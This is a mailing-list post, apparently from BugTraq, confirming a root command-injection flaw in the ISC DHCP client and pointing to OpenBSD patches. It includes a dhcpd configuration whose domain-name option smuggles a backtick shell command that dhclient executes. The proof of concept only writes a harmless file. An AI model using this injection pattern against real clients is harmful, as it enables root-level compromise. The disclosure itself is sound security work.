Re: possible root exploit in ISC DHCP client.

[todd () FRIES NET (Todd T. Fries)]

> Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP
> client.
Yes, I can confirm that as of 6:23am on June 23rd after several hours of
hacking around the sources I had the following dhcpd config running on my
own machine's private network for testing:

    shared-network LOCAL-NET {
        option  domain-name "my.`echo hi > /tmp/oops`.domain";
        option  domain-name-servers 192.168.1.3, 192.168.1.5;

        subnet 192.168.1.0 netmask 255.255.255.0 {
                option routers 192.168.1.1;

                range 192.168.1.32 192.168.1.127;
        }
    }

... and when dhclient finished running I had a nice little present
in /tmp/ named 'oops' that contained the string 'hi' ..

You did not miss my post to BugTraq because this is my first post.  After
conferring with my collegues, we decided the first priority was to get
a fix .. then to notify people.  I am sorry you had to hear about this
4th hand, we really wanted people to know about it and the fix at the
same time.

As it turned out, between scheduled talks, other distractions, and the
net heading downstream early in the afternoon .. we were not able to
complete a fix and notify people before posting to bugtraq while
in San Diego.

While developed independently, we believe your fix will also work.

We have now had time to complete the patch, which is in the cvs tree,
and we have made source patches available for releases of OpenBSD 2.5 - 2.7.

Please visit http://www.openbsd.org/errata.hml#dhclient for links to
the patches for OpenBSD.